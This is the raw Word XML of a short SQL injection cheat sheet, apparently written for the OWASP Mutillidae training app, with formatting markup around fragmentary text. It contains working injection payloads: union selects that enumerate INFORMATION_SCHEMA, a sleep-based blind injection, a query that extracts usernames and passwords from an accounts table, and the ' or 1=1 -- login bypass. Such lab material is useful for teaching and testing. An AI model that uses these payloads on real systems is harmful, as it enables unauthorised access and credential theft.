      </w:hyperlink>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Extract table names from database.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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>null,table_schema</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username,table_name</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password,null</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> from INFORMATION_SCHEMA.TABLES--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Extract table columns from database using a single field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table_schema</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table_name</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column_name</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INFORMATION_SCHEMA.COLUMNS--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Extract views from database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COALESCE(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>table_schema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,''), COALESCE(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,''), COALESCE(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>view_definition</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INFORMATION_SCHEMA.VIEWS--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Extract triggers from database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trigger_schema</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trigger_name</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INFORMATION_SCHEMA.TRIGGERS--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Extract routines/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFEE"/>
        </w:rPr>
        <w:t>procs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFEE"/>
        </w:rPr>
        <w:t xml:space="preserve"> from database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routine_schema</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routine_name</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routine_type</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routine_body</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INFORMATION_SCHEMA.ROUTINES--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Extract table columns from database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table_schema</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table_name</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column_name</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INFORMATION_SCHEMA.COLUMNS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routine_schema</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routine_name</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routine_type</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routine_body</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INFORMATION_SCHEMA.ROUTINES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table_schema</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table_name</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view_definition</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INFORMATION_SCHEMA.VIEWS union select </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>null,concat_ws</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trigger_schema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>trigger_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">) AS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>username,null,null</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> from INFORMATION_SCHEMA.TRIGGERS--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lastRenderedPageBreak/>
        <w:t>Blind SQL injection does not depend on seeing any resulting records. Instead, page timing can be used.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 xml:space="preserve">Blind SQL Injection/Brute Forcing values (Example Page: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFEE"/>
        </w:rPr>
        <w:t>login.php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null, case </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>current_user</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>() when '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>root@localhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">' THEN sleep(5) ELSE sleep(0) END, null, null -- </w:t>
      </w:r>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="threeDEngrave" w:sz="6" w:space="2" w:color="000000" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="CCCCCC"/>
        </w:rPr>
        <w:t>Gaining Access</w:t>
      </w:r>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Extract passwords from user table (Example Page: user-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFEE"/>
        </w:rPr>
        <w:t>info.php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xml:space="preserve">' union select null, owasp10.accounts.username AS username, owasp10.accounts.password AS password, null from owasp10.accounts -- </w:t>
      </w:r>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFEE"/>
        </w:rPr>
        <w:t xml:space="preserve">Using SQL Injection (Page: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFEE"/>
        </w:rPr>
        <w:t>login.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFEE"/>
        </w:rPr>
        <w:t>) </w:t>
      </w:r>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>' or 1=1 --</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00382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12F1C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B31CE0F0"/>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C4"/>
    <w:rsid w:val="003876C4"/>
    <w:rsid w:val="00C24351"/>
    <w:rsid w:val="00C5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30B1-98F5-4A54-9532-646B8C5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76C4"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="important-code">
    <w:name w:val="important-code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="003876C4"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="report-header">
    <w:name w:val="report-header"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="003876C4"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003876C4"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003876C4"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="0038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12572">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="212614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64.com/orad/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ss64.com/or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1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-01-02T10:34:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-01-02T10:35:00Z</dcterms:modified>
</cp:coreProperties>
</file>